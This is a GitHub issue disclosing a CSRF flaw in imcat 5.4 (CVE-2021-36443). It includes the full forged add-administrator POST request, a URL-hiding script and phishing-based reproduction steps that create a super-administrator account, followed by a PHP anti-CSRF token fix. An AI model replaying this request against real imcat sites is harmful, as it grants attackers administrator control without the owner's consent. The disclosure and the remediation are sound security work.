CVE-2021-36443: CSRF vulnerability in imcat v5.4 · Issue #9 · peacexie/imcat
Cross Site Request Forgery vulnerability in imcat 5.4 allows remote attackers to escalate privilege via lack of token verification.
### 1. Overview
Official website: http://txjia.com/imcat/
Version: imcat-5.4
Vulnerability type: CSRF (POST request)
Source code: https://github.com/peacexie/imcat/releases/tag/v5.4
Impact: a super administrator account can be added
### 2. Analysis
#### 2.1 Logic analysis
On the add-administrator page, the origin of the submitted data is verified neither by a token nor by a Referer check.
(1) The request contains no token for security verification, so it can be forged. The captured request:
```http
POST /imcat/root/run/adm.php?dops-a&mod=adminer&view=form&stype=& HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 539
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/imcat/root/run/adm.php?dops-a&mod=adminer&view=form&stype=&recbk=ref
Cookie: Hm_lvt_948dba1e5d873b9c1f1c77078c521c89=1622443371; CKFinder_Path=Files%3A%2F%3A1; v49_sessid_4294e52897e5=2021-6b-hg49-yttfxda8f-7e5f79d1a; v49_Uniqueid_01348a66d0e6=2021-6h-a25c-5s8pgxq58-0e63b0fe2; Hm_lpvt_948dba1e5d873b9c1f1c77078c521c89=1622444424; twVscAv_admauth=1606cECE916XO1gVfiR9ahqpqkEJMTxa4R5XjBOh69Cfppjn2zcpGMtx5x7BRkm4L0Vposdev%2B2ydGfzzC3me67ttA1foMK2UXNSybiOLOvH; v49_vcodes=fmadm%3Dnull%0Afmcomadd%3D1623809462%2C49f8c2fc48af351f%0Afmapply%3D1623830847%2C7da4f846fdbd0243%0A; v49_ocar_items=0; PHPSESSID=5b4be5ad4c47747257ac13a5c15265c9
Upgrade-Insecure-Requests: 1

recbk=http%3A%2F%2F127.0.0.1%2Fimcat%2Froot%2Frun%2Fadm.php%3Fdops-a%26mod%3Dadminer&fm%5Buid%5D=2021-6p-j6xk&fm%5Buno%5D=1&fm%5Buname%5D=qwe_123&fm%5Bupass%5D=adm_123&fm%5Bgrade%5D=supper&fm%5Bshow%5D=1&fm%5Bmname%5D=qwe_123&fm%5Bindep%5D=inadm&fm%5Bmiuid%5D=&fm%5Bmtel%5D=12345678091&fm%5Bmemail%5D=23wqw%4022.com&fm%5Bmaddr%5D=&fm%5Batime%5D=2021-06-21+17%3A14%3A49&fm%5Betime%5D=2021-06-21+17%3A14%3A49&fm%5Bauser%5D=adm_123&fm%5Beuser%5D=adm_123&fm%5Baip%5D=127.0.0.1&fm%5Beip%5D=127.0.0.1&bsend=%E6%8F%90%E4%BA%A4&mod=adminer&isadd=1
```
(2) After removing the Referer header, an administrator can still be added, so the server does not check it either.
### 3. Vulnerability reproduction
(1) Environment preparation: set up the environment with phpStudy.
(2) Construct a payload page that submits the add-administrator form, creating the super administrator account qwe_123/adm_123. The page hides its URL with:
```html
<script>history.pushState('', '', '/')</script>
```
(3) Lure the logged-in administrator into opening the page by phishing; the super administrator account is then added without the administrator's knowledge.
![image](https://user-images.githubusercontent.com/58809869/123199520-9c4db300-d4e1-11eb-8c46-94d9a911babe.png)
![image](https://user-images.githubusercontent.com/58809869/123199525-9f48a380-d4e1-11eb-8d18-87c3044191a5.png)
![image](https://user-images.githubusercontent.com/58809869/123199531-a2dc2a80-d4e1-11eb-9df6-fb13551bbcfe.png)
### 4. Verification of attack results
Log in to the admin backend with qwe_123/adm_123.
### 5. Means of defense
Add a token to every place where an important action is performed and verify it on the server before acting. The token value must be random and unpredictable.
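The following is an added example of such a check, written for this issue and not taken from imcat's code base. It shows a per-session anti-CSRF token (generated with the OS CSPRNG, embedded in the form, compared in constant time) plus a secondary Origin/Referer check that rejects a missing header rather than trusting it, since the report shows the request still succeeds with Referer removed. All function names, the `csrf_token` field name, and the sample requests are assumptions for illustration.

```php
<?php
// Added example, not imcat's own code: anti-CSRF protection for a
// state-changing admin form such as the add-administrator request above.
// Function names and the "csrf_token" field name are hypothetical.
declare(strict_types=1);

// Start the PHP session if the caller has not already done so.
function ensure_session(): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
}

// Return the session's CSRF token, creating it on first use. random_bytes()
// draws from the OS CSPRNG, so the value is unpredictable (32 bytes = 64 hex).
function csrf_token(): string
{
    ensure_session();
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden input to embed in the form template. A cross-site page cannot read
// this value because of the same-origin policy, so it cannot forge the form.
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

// Verify the submitted token. hash_equals() compares in constant time so the
// token cannot be recovered byte by byte from timing differences.
function csrf_verify(array $post): bool
{
    ensure_session();
    $expected = $_SESSION['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? '';
    if ($expected === '' || !is_string($given) || $given === '') {
        return false;
    }
    return hash_equals($expected, $given);
}

// Defence in depth: the Origin header (or, failing that, the Referer host)
// must match our own Host. A missing header is rejected, not trusted; the
// token check above remains the primary control.
function same_origin(array $server): bool
{
    $ownHost = $server['HTTP_HOST'] ?? '';
    $source  = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    if ($ownHost === '' || $source === '') {
        return false;
    }
    $parts = parse_url($source);
    if ($parts === false || empty($parts['host'])) {
        return false;
    }
    $sourceHost = $parts['host'] . (isset($parts['port']) ? ':' . $parts['port'] : '');
    return strcasecmp($sourceHost, $ownHost) === 0;
}

// Guard to run before the add-administrator logic (mod=adminer&isadd=1 in the
// report). Returns a result array instead of exiting so it can be unit-tested.
function guard_admin_form(array $server, array $post): array
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return ['ok' => false, 'error' => 'method not allowed'];
    }
    if (!same_origin($server)) {
        return ['ok' => false, 'error' => 'origin check failed'];
    }
    if (!csrf_verify($post)) {
        return ['ok' => false, 'error' => 'csrf token missing or invalid'];
    }
    return ['ok' => true, 'error' => null];
}

// Demonstration when run from the command line (php csrf_guard.php).
if (PHP_SAPI === 'cli') {
    $server = ['REQUEST_METHOD' => 'POST', 'HTTP_HOST' => '127.0.0.1',
               'HTTP_ORIGIN'    => 'http://127.0.0.1'];
    // Constructed request shaped like the one in the report: no token field.
    $forged = ['fm' => ['uname' => 'qwe_123', 'grade' => 'supper'], 'isadd' => '1'];
    $r = guard_admin_form($server, $forged);
    echo 'without token: ', $r['ok'] ? 'allowed' : 'rejected (' . $r['error'] . ')', "\n";
    // Legitimate submission carries the token rendered into the real form.
    $legit = $forged + ['csrf_token' => csrf_token()];
    $r = guard_admin_form($server, $legit);
    echo 'with token:    ', $r['ok'] ? 'allowed' : 'rejected (' . $r['error'] . ')', "\n";
}
```

In a real deployment `csrf_field()` is echoed inside every state-changing form and `guard_admin_form()` runs before any write; the token lives in the server-side session, never in a cookie alone, because the browser attaches cookies automatically and that is exactly what the forged request relies on.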